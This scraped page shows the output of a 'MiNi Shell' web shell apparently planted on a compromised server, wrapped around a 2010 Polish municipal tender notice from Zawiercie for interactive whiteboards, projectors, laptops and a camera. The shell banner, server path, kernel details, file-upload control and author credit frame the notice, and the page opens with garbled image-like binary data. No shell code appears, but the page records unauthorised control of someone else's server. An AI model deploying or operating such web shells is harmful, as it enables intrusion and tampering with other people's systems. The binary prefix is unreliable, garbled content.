JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100427/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100427/100037-N-2010.html

<p class="kh_header"><b>Zawiercie: Dostawa materiałów dydaktycznych - tablicy interaktywnej z oprzyrządowaniem (zadanie nr 1) oraz aparatu fotograficznego (zadanie nr 2) w ramach projektu Edukacja dla rozwoju realizowanego w zakresie działania 9.1 Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty (Poddziałanie 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych) Programu Operacyjnego Kapitał Ludzki.</b><br>
<b>Numer ogłoszenia: 100037 - 2010; data zamieszczenia: 27.04.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Prezydent Miasta Zawiercie , ul. Leśna 2, 42-400 Zawiercie, woj. śląskie, tel. 032 6722684, faks 032 6721513.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.zawiercie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa materiałów dydaktycznych - tablicy interaktywnej z oprzyrządowaniem (zadanie nr 1) oraz aparatu fotograficznego (zadanie nr 2) w ramach projektu Edukacja dla rozwoju realizowanego w zakresie działania 9.1 Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty (Poddziałanie 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych) Programu Operacyjnego Kapitał Ludzki..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa materiałów dydaktycznych - tablicy interaktywnej z oprzyrządowaniem (zadanie nr 1) oraz aparatu fotograficznego (zadanie nr 2) w ramach projektu Edukacja dla rozwoju realizowanego w zakresie działania 9.1 Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty (Poddziałanie 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych) Programu Operacyjnego Kapitał Ludzki, wg poniższego zestawienia:
ZADANIE NR 1
Tablica interaktywna z oprzyrządowaniem, w skład której wchodzi:
1. Tablica multimedialna (8 sztuk), o parametrach nie gorszych niż:
LP. Podzespół/Wymagania, Parametry/Wymagania minimalne
1) Technologia pozycjonowania: Pozycjonowanie w podczerwieni
2) Format obrazu: 4:3
3) Przekątna ekranu: 72 cale
4) Powierzchnia ekranu:Matowa
5) Obsługa: Pisak, palec, wskaźnik
6) Technologia transmisji: USB
7) Szybkość transmisji: 12 Mb/s
8) Porty:	1 x USB
9) Wyposażenie: 3 markery (czerwony, czarny, niebieski), wskaźnik teleskopowy, gąbka, półka na pisaki automatycznie rozpoznająca, który pisak został podniesiony, kabel USB o długości 6 m do podłączenia z komputerem, oryginalny nośnik zawierający oprogramowanie.
10) Oprogramowanie: Polska wersja językowa oprogramowania, która umożliwia: rozpoznanie ruchu ręki: pojedynczy palec, kilka palców, dotyk w dwóch miejscach; pisanie: palcem, wskaźnikiem lub tradycyjnym pisakiem; dotyk: palec lub wskaźnik zastępują w pełni wszystkie funkcje myszy komputerowej; indywidualne ustawienia: tło, rodzaj tekstu, typ ekranu.
Oprogramowanie winno akceptować pliki w formatach: PPT, Word, Excell, AVI, MEPG, JPEG.
11) Wymagane normy - Deklaracja CE (należy załączyć przy dostawie dokument potwierdzający spełnienie wymogu) 
12) Gwarancja: 36 miesięcy od daty dostarczenia sprzętu do Zamawiającego
2. Projektor multimedialny (8 sztuk), o parametrach nie gorszych niż:
LP.Podzespół/Wymagania, Parametry/Wymagania minimalne
1) Technologia: LCD
2) Jasność: 2000 ANSI lm.
3) Rozdzielczość: XGA (1024x768)
4) Kontrast: 600:1
5) Format obrazu: 4:3.
6) Odległość projekcyjna: 1,1 -10,0 m
7) Kompatybilność wideo: Pal, SECAM, NTSC, NTSC 4.43, PAL-M/N
8) Korekcja trapezu: Pionowa +/- 20 
9) Żywotność lampy: 2000 w trybie normalnym
10) Porty: 1 x RGB (D-sub15) - wejście
1 x RGB (D-Sub15) lub wyjście monitorowe - wyjście
1 x Composite (RCA)
1 x 3.5mm Stereo Jack dla komputera
2 x RCA (R/L mono) dla video
1 x Mini DIN 8-pin (RS-232)
11) Wyposażenie: Pilot na podczerwień zdalnego sterowania, kabel zasilania, kabel do podłączenia komputera, uchwyt do mocowania na suficie.
12) Wymagane normy - Deklaracja CE (należy załączyć przy dostawie dokument potwierdzający spełnienie wymogu) 
13) Gwarancja: 60 miesięcy od daty dostarczenia sprzętu do Zamawiającego na urządzenie w tym 36 miesięcy na lampę.
3. Laptop (8 sztuk), o parametrach nie gorszych niż:
LP. Podzespół, Wymagania,Parametry,Wymagania minimalne
1) Procesor: Procesor klasy x86 dwurdzeniowy, musi uzyskiwać w teście Passmark CPU Mark wynik co najmniej 1246 punktów (wynik zaproponowanego procesora musi być opublikowany na stronie http:www.cpubenchmark.net) na dzień 27.04.2010 r. (w załączeniu SIWZ wydruk ze strony z tej daty).
2) Karta graficzna: zintegrowana,  DirectX10, lub o równoważnej wydajności
3) Dysk twardy: Pojemność: min. 250 GB
Interfejs: Serial ATA 
Prędkość obrotowa: 5400 obr.min
4) Pamięć RAM: Rodzaj pamięci: DDR2 667 MHz
Pojemność pamięci: 2048 MB
5) Wyświetlacz: 5,4 cala WXGA (rozdzielczość 1280 x 800 px), 
6) Sieć:	Modem 56K
Karta sieciowa (10; 100 Mbps)
Karta WiFi 802.11b; 802.11g; 802.11n
7) Napędy: Wbudowany napęd optyczny (odczyt i zapis: CD; DVD; DVD DL)
8) Urządzenie do obsługi kart pamięci	MemoryStick; MemoryStick Pro; Secure Digital [SD]; Xd Picture Card; MultiMedia Card;
9) Wprowadzanie danych: Pełnowymiarowa klawiatura
Touchpad
10) Porty: Wejście zasilania (DC-in); D-SUB (wyjście VGA); RJ11 (modem); RJ45 (LAN); Słuchawki; Mikrofon; Wejście liniowe, Express Card, 2 x USB, 
11) Karta dźwiękowa: zintegrowana
12) Oprogramowanie systemowe: Windows Vista Home Basic, licencja + nośnik z oprogramowaniem 
13) Wymagane normy: Deklaracja CE (należy załączyć przy dostawie dokument potwierdzający spełnienie wymogu)
14) Inne: Niezbędne sterowniki i oprogramowanie na płycie CD/DVD, wbudowana kamera internetowa
15) Gwarancja: 36 miesięcy od daty dostarczenia sprzętu do Zamawiającego
ZADANIE NR 2
Aparat fotograficzny typu lustrzanka (1 sztuka), o parametrach nie gorszych niż:
LP.Podzespół, Wymagania, Parametry, Wymagania minimalne
Korpus:
1) Efektywna liczba pikseli: 12 milionów
2) Matryca: CMOS
3) Maksymalna rozdzielczość: 4272 x 2848 pikseli
4) Migawka: 30 - 1/4000 sek.
5) System fotometryczny: matrycowy, częściowy, centralnie-ważony uśredniony, punktowy
6) Nastawy ekspozycji: auto, priorytet przysłony, priorytet czasu, manual, programy tematyczne, wybór głębi ostrości
7) Format zapisu danych: RAW oraz JPEG
8) Zdjęcia seryjne:	3.5 kl/sek, do 6 zdjęć w formacie RAW, do 53 zdjęć w formacie JPEG
9) Pamięć: SD/SDHC
10) Czułość: Auto: 100 - 400 ISO, 100, 200, 400, 800, 1600 ISO
11) Złącza: USB 2.0, VIDEO, zasilające
12) Wyświetlacz LCD: 3 cale TFT LCD, 200 000 - 250 000  pikseli,
13) Balans bieli: auto, światło dzienne, chmury, światło żarowe, światło jarzeniowe, tryb ręczny, bracketing balansu bieli +/- 3 stopnie
14) Zasilanie: akumulator dedykowany litowo-jonowy
15) Inne:	możliwość  zdalnego sterowania, efekty cyfrowe ( m.in. sepia, zdjęcia czarno-białe), samowyzwalacz,  wizjer optyczny, wbudowana lampa błyskowa, złącze lampy błyskowej, autofocus, ostrość ręczna
Obiektyw do aparatu jak wyżej
16) Ogniskowa: 18 mm - 55 mm
17) Inne:	autofokus, stabilizacja obrazu, filtr
18) Gwarancja: 24 miesiące od daty dostarczenia sprzętu do Zamawiającego
1.Zamawiający dopuszcza możliwość złożenia oferty przez Wykonawcę na dostawę przedmiotu zamówienia o parametrach równoważnych nie gorszych niż wymienione powyżej. Jeżeli w opisie przedmiotu zamówienia znajduje się jakikolwiek znak towarowy, patent czy pochodzenie należy przyjąć, że Zamawiający podał taki opis ze wskazaniem na typ o parametrach technicznych, właściwościach eksploatacyjnych i funkcjonalnych nie gorszych niż te, podane pod pojęciem typu (art. 29 ust. 3 ustawy Prawo zamówień publicznych). Wykonawca, który powołuje się na rozwiązania równoważne (zaoferował produkt równoważny), jest zobowiązany wykazać, że oferowany przez niego przedmiot zamówienia spełnia wymagania określone przez Zamawiającego.
2.Zamawiający uzna wszystkie parametry lepsze niż opisane w SIWZ i załączniku nr 3A do SIWZ za zgodne z niniejszą specyfikacją.
3.Wykonawca zobowiązuje się na własny koszt i ryzyko dostarczyć do siedziby Zamawiającego przedmiot zamówienia. W dniu przekazania przedmiotu umowy zostanie sporządzony protokół odbioru.
4. Wykonawca dostarczy przedmiot zamówienia fabrycznie nowy. 
5. Sprzęt powinien posiadać oznakowanie CE (deklaracje zgodności z CE na oferowany sprzęt - przy dostawie).
6.Wykonawca zobowiązuje się na własny koszt i ryzyko dostarczyć przedmiot zamówienia do Biura Jednostki Realizującej Projekt Edukacja dla rozwoju z siedzibą w Zawierciu, ul. 11-go Listopada 22..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.21.31.00-6, 38.65.21.00-1, 38.65.34.00-1, 38.65.10.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 7.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia warunku szczegółowego w tym zakresie. Wykonawca składa oświadczenie o spełnianiu watunków określonych w art. 22 ust. 1 Pzp.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia warunku szczegółowego w tym zakresie. Wykonawca składa oświadczenie o spełnianiu watunków określonych w art. 22 ust. 1 Pzp.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia warunku szczegółowego w tym zakresie. Wykonawca składa oświadczenie o spełnianiu watunków określonych w art. 22 ust. 1 Pzp.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia warunku szczegółowego w tym zakresie. Wykonawca składa oświadczenie o spełnianiu watunków określonych w art. 22 ust. 1 Pzp.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia warunku szczegółowego w tym zakresie. Wykonawca składa oświadczenie o spełnianiu watunków określonych w art. 22 ust. 1 Pzp.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Druk Formularz oferty, sporządzony wg wzoru stanowiącego załącznik nr 3  specyfikacji. 2) Opis techniczny przedmiotu zamówienia, sporządzony wg wzoru stanowiącego załącznik nr 3a do formularza oferty i SIWZ. W szczególności należy określić oferowany model i nazwę producenta. Ponadto należy potwierdzić minimalne parametry i konfigurację oferowanego przedmiotu zamówienia oraz innych wymogów przez sformułowanie słowne np. tak, spełnia, albo wskazanie konkretnego parametru lub konfiguracji zgodnie z treścią załącznika nr 1a do Formularza oferty.3) Wykaz części zamówienia, które wykonawca zamierza powierzyć podwykonawcom, złożony na druku stanowiącym załącznik nr 4 do SIWZ (Wykonawca, który nie przewiduje udziału podwykonawców w realizacji zamówienia - nie składa tego dokumentu).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Z wykonawcą, który złoży najkorzystniejszą ofertę zostanie zawarta umowa, której wzór stanowi załącznik do niniejszej specyfikacji istotnych warunków zamówienia.
2. Zamawiający przewiduje możliwość istotnych zmian postanowień umowy w przypadku, gdy:
1) między dniem złożenia oferty, a dniem dostarczenia towaru zaistnieje sytuacja, że  zaoferowany towar nie będzie dostępny na rynku na skutek wycofania z produkcji  pod warunkiem, że nowy towar będzie posiadał parametry techniczne nie gorsze niż towar wcześniej oferowany,
2) nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym
wpływ na realizację przedmiotu zamówienia, 
3) wynikną rozbieżności lub niejasności w umowie, których nie można usunąć w inny sposób, a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie umowy w celu jednoznacznej interpretacji jej zapisów przez strony.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zawiercie.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Zawierciu, ul. Leśna 2, 42-420, Wydział Zamówień Publicznych.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.05.2010 godzina 08:00, miejsce: Urząd Miejski w Zawierciu., ul. Leśna 2 Punkt Obsługi Interesanta (Informacja), parter UM.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com